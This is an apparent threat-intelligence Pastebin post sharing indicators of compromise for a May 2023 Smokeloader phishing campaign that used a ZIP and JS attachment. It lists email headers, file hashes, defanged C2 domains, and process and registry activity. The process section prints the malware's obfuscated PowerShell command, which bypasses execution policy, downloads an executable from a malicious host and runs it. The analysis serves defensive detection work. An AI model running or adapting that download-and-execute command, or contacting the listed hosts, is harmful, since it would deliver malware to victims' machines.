VRad

#smokeloader_040523

May 5th, 2023 (edited)
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.76 KB | None | 0 0
  1. #IOC #OptiData #VR #smokeloader #ZIP #JS
  2.  
  3. https://pastebin.com/RDVXCe0J
  4.  
  5. previous_contact:
  6. https://pastebin.com/QpG70u8T
  7. https://pastebin.com/BJzcXqkK
  8. https://pastebin.com/kBW7nkZ5
  9. https://pastebin.com/Z7zq0YkW
  10. https://pastebin.com/b8PkhMyN
  11. https://pastebin.com/hkskwKvc
  12. https://pastebin.com/JmthzrL4
  13. https://pastebin.com/1scwT0f8
  14. https://pastebin.com/MP3kCSSh
  15.  
  16. FAQ:
  17. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  18. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  19.  
  20. attack_vector
  21. --------------
  22. email attach .zip? > JS > WSH > PowerShell > GET 1URL > exe
  23.  
  24.  
  25. # # # # # # # #
  26. email_headers
  27. # # # # # # # #
  28. Return-Path: <[email protected]>
  29. Received: from kr-admin.gov.ua (mail.kr-admin.gov.ua [195.62.15.59])
  30. Received: from [127.0.0.1] by kr-admin.gov.ua (MDaemon PRO v9.6.1)
  31. Subject: рахунок від 02.05.2023
  32. Message-Id: <[email protected]>
  33. Date: Thu, 4 May 2023 07:23:20 +0300
  34. X-Mailer: iPad Mail (13E238)
  35. X-Authenticated-Sender: [email protected]
  36.  
  37.  
  38. # # # # # # # #
  39. files
  40. # # # # # # # #
  41. SHA-256 352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd
  42. File name pax_2023_AB1058.zip [ Zip archive data, at least v2.0 to extract ]
  43. File size 955.61 KB (978548 bytes)
  44.  
  45. SHA-256 3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25
  46. File name pax_2023_AB1058.pdf [ PDF document, version 1.7 ]
  47. File size 1.13 MB (1180511 bytes)
  48.  
  49. SHA-256 f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea
  50. File name pax_2023_AB1058..js [ JavaScript ]
  51. File size 28.29 KB (28967 bytes)
  52.  
  53. SHA-256 cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae
  54. File name portable.exe (TempgEq94.exe) [ PE32 executable for MS Windows ]
  55. File size 263.50 KB (269824 bytes)
  56.  
  57.  
  58. # # # # # # # #
  59. activity
  60. # # # # # # # #
  61.  
  62. PL_SCR http://homospoison{ .ru/one/portable.exe [193.106.175.177]
  63.  
  64.  
  65. C2
  66.  
  67. http://coudzoom{ .ru/
  68. http://balkimotion{ .ru/
  69. http://ligaspace{ .ru/
  70. http://ipodromlan{ .ru/
  71. http://redport80{ .ru/
  72. http://superboler{ .com/
  73. http://lamazone{ .site/
  74. http://criticalosl{ .tech/
  75. http://3dstore{ .pro/
  76. http://humanitarydp{ .ug/
  77. http://shopersport{ .ru/
  78. http://sindoproperty{ .org/
  79. http://maximprofile{ .net/
  80. http://zaliphone{ .com/
  81.  
  82.  
  83.  
  84. netwrk
  85. --------------
  86. 193.106.175.177 homospoison.ru 80 HTTP GET /one/portable.exe HTTP/1.1 Google Chrome
  87.  
  88.  
  89. comp
  90. --------------
  91. powershell.exe 193.106.175.177 homospoison.ru
  92.  
  93.  
  94. proc
  95. --------------
  96. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"
  97. "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp
  98. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','C:\Users\support\AppData\Local\TempgEq94.exe');
  99. C:\Users\support\AppData\Local\TempgEq94.exe
  100.  
  101.  
  102. persist
  103. --------------
  104. n/a
  105.  
  106.  
  107. drop
  108. --------------
  109. C:\Users\%username%\AppData\Local\TempgEq94.exe
  110.  
  111.  
  112. # # # # # # # #
  113. additional info
  114. # # # # # # # #
  115.  
  116.  
  117. TTPs: Query Registry System Information Discovery
  118. wscript.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation
  119.  
  120. TTPs: Email Collection
  121. explorer.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
  122. \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  123. \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  124.  
  125.  
  126. # # # # # # # #
  127. VT & Intezer
  128. # # # # # # # #
  129. https://www.virustotal.com/gui/file/352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd/details
  130. https://www.virustotal.com/gui/file/3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25/details
  131. https://www.virustotal.com/gui/file/f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea/details
  132. https://www.virustotal.com/gui/file/cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae/details
  133. https://analyze.intezer.com/analyses/27e7086e-09d8-4998-9e25-06c41e34a42d
  134.  
  135. VR
Add Comment
Please, Sign In to add comment